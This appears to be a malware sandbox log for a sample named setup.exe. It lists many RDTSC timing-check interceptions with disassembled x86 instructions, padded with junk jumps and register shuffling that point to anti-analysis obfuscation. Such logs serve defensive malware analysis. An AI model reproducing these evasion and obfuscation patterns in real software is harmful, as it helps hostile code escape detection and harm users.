Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D701A8 second address: 4D701C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C24 second address: 4D90C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 pushad 0x00000007 movzx ecx, dx 0x0000000a mov edi, 786A2838h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FF32CFB7201h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 mov ebx, 470ECAAEh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF32CFB7200h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C69 second address: 4D90C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C6F second address: 4D90C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C73 second address: 4D90C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D907D4 second address: 4D9084B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CFB7200h 0x00000008 sbb cx, A018h 0x0000000d jmp 00007FF32CFB71FBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FF32CFB7202h 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 jmp 00007FF32CFB71FEh 0x00000026 pushfd 0x00000027 jmp 00007FF32CFB7202h 0x0000002c adc ch, FFFFFFD8h 0x0000002f jmp 00007FF32CFB71FBh 0x00000034 popfd 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D9084B second address: 4D90853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA01E8 second address: 4DA01ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA01ED second address: 4DA0206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6575h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0206 second address: 4DA0296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF32CFB71FEh 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007FF32CFB7201h 0x00000018 mov edx, ecx 0x0000001a pop esi 0x0000001b pushad 0x0000001c mov ax, dx 0x0000001f popad 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 jmp 00007FF32CFB71FEh 0x00000028 pushfd 0x00000029 jmp 00007FF32CFB7202h 0x0000002e sub si, 99A8h 0x00000033 jmp 00007FF32CFB71FBh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ebp, esp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF32CFB7205h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0296 second address: 4DA02B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA02B3 second address: 4DA02B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA02B9 second address: 4DA02BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE001B second address: 4DE0021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0021 second address: 4DE0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0025 second address: 4DE0029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0029 second address: 4DE0087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF32CDD6579h 0x00000012 sbb al, 00000036h 0x00000015 jmp 00007FF32CDD6571h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FF32CDD6570h 0x00000021 xor ax, B758h 0x00000026 jmp 00007FF32CDD656Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0087 second address: 4DE008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE008D second address: 4DE00F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF32CDD6573h 0x00000013 add ax, B2CEh 0x00000018 jmp 00007FF32CDD6579h 0x0000001d popfd 0x0000001e push ecx 0x0000001f pop edi 0x00000020 popad 0x00000021 mov dx, si 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007FF32CDD6576h 0x0000002c pop ebp 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov esi, 2371CB53h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0425 second address: 4DB0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF32CFB7202h 0x00000012 mov eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB7207h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0460 second address: 4DB04DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d mov ax, A163h 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007FF32CDD656Fh 0x00000018 xor ax, D38Eh 0x0000001d jmp 00007FF32CDD6579h 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 and dword ptr [eax+04h], 00000000h 0x00000029 jmp 00007FF32CDD6577h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bh, 56h 0x00000034 mov si, 6113h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90642 second address: 4D90651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90651 second address: 4D90657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90657 second address: 4D9065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0E91 second address: 4DA0E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0E97 second address: 4DA0E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB02A1 second address: 4DB02A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0777 second address: 4DD077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD077B second address: 4DD078E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD078E second address: 4DD0794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0794 second address: 4DD0798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0798 second address: 4DD07CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FF32CFB7204h 0x00000014 sbb cl, 00000068h 0x00000017 jmp 00007FF32CFB71FBh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD07CA second address: 4DD0800 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FF32CDD6572h 0x00000010 mov ebp, esp 0x00000012 jmp 00007FF32CDD6570h 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0800 second address: 4DD0804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0804 second address: 4DD0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0808 second address: 4DD080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD080E second address: 4DD0870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 74h 0x00000005 pushfd 0x00000006 jmp 00007FF32CDD6577h 0x0000000b or ecx, 12DC386Eh 0x00000011 jmp 00007FF32CDD6579h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FF32CDD6571h 0x00000020 xchg eax, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF32CDD656Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0870 second address: 4DD0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [774365FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov eax, edi 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0893 second address: 4DD08F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c push esi 0x0000000d mov dl, 54h 0x0000000f pop ecx 0x00000010 pushfd 0x00000011 jmp 00007FF32CDD656Fh 0x00000016 xor ch, FFFFFFEEh 0x00000019 jmp 00007FF32CDD6579h 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007FF39F3B95F0h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF32CDD656Dh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD08F1 second address: 4DD0919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d jmp 00007FF32CFB7202h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0919 second address: 4DD091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD091D second address: 4DD0937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0937 second address: 4DD0967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FF32CDD6576h 0x00000011 ror eax, cl 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0967 second address: 4DD096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD096B second address: 4DD0971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0971 second address: 4DD09D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 mov edi, 55AB2E82h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d leave 0x0000000e jmp 00007FF32CFB7209h 0x00000013 retn 0004h 0x00000016 nop 0x00000017 mov esi, eax 0x00000019 lea eax, dword ptr [ebp-08h] 0x0000001c xor esi, dword ptr [00C82014h] 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 lea eax, dword ptr [ebp-10h] 0x00000028 push eax 0x00000029 call 00007FF331147BA1h 0x0000002e push FFFFFFFEh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FF32CFB7203h 0x00000039 add ch, FFFFFFDEh 0x0000003c jmp 00007FF32CFB7209h 0x00000041 popfd 0x00000042 mov eax, 47CE25A7h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD09D7 second address: 4DD0A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ecx, 477649BBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 mov al, 35h 0x00000012 popad 0x00000013 ret 0x00000014 nop 0x00000015 push eax 0x00000016 call 00007FF330F66F5Ah 0x0000001b mov edi, edi 0x0000001d jmp 00007FF32CDD6572h 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0A06 second address: 4DD0A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0A23 second address: 4DD0A63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FF32CDD6577h 0x00000010 mov bx, si 0x00000013 pop esi 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, di 0x0000001f mov bl, D8h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0A63 second address: 4DD0AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 5785811Bh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF32CFB71FEh 0x00000018 xor si, E9E8h 0x0000001d jmp 00007FF32CFB71FBh 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov edi, 735172C4h 0x00000030 push ebx 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80051 second address: 4D800C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 pushfd 0x00000011 jmp 00007FF32CDD6578h 0x00000016 sub cl, FFFFFF98h 0x00000019 jmp 00007FF32CDD656Bh 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 jmp 00007FF32CDD6570h 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FF32CDD6570h 0x0000002f add cx, 4228h 0x00000034 jmp 00007FF32CDD656Bh 0x00000039 popfd 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D800C9 second address: 4D8010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e mov cl, bl 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FF32CFB7206h 0x00000017 sbb ch, FFFFFFB8h 0x0000001a jmp 00007FF32CFB71FBh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx ebx, ax 0x00000028 push eax 0x00000029 pop edi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8010B second address: 4D80111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80111 second address: 4D80131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF32CFB71FEh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ecx, 03CFC963h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80131 second address: 4D8017D instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007FF32CDD656Bh 0x0000000e and si, 1B8Eh 0x00000013 jmp 00007FF32CDD6579h 0x00000018 popfd 0x00000019 popad 0x0000001a popad 0x0000001b mov ebx, dword ptr [ebp+10h] 0x0000001e jmp 00007FF32CDD656Dh 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8017D second address: 4D80181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80181 second address: 4D80185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80185 second address: 4D8018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8018B second address: 4D80206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6572h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CDD656Bh 0x0000000f xchg eax, esi 0x00000010 jmp 00007FF32CDD6576h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 mov dl, al 0x0000001b jmp 00007FF32CDD6573h 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 jmp 00007FF32CDD6576h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF32CDD656Eh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80206 second address: 4D80239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b jmp 00007FF32CFB71FFh 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF32CFB7205h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80239 second address: 4D8023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8023F second address: 4D80253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FF39F5E55C4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80253 second address: 4D80257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80257 second address: 4D8025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8025B second address: 4D80261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80261 second address: 4D802DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 push ecx 0x00000014 mov ax, bx 0x00000017 pop edx 0x00000018 popad 0x00000019 je 00007FF39F5E5599h 0x0000001f jmp 00007FF32CFB7206h 0x00000024 mov edx, dword ptr [esi+44h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007FF32CFB71FDh 0x0000002f pushfd 0x00000030 jmp 00007FF32CFB7200h 0x00000035 or eax, 1C579368h 0x0000003b jmp 00007FF32CFB71FBh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D802DB second address: 4D80355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6572h 0x00000009 xor eax, 7880E5C8h 0x0000000f jmp 00007FF32CDD656Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b jmp 00007FF32CDD6576h 0x00000020 test edx, 61000000h 0x00000026 pushad 0x00000027 call 00007FF32CDD656Dh 0x0000002c push esi 0x0000002d pop ebx 0x0000002e pop ecx 0x0000002f popad 0x00000030 jne 00007FF39F4048B7h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF32CDD6576h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80355 second address: 4D8035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8035B second address: 4D8035F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8035F second address: 4D80371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80371 second address: 4D80375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80375 second address: 4D8037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
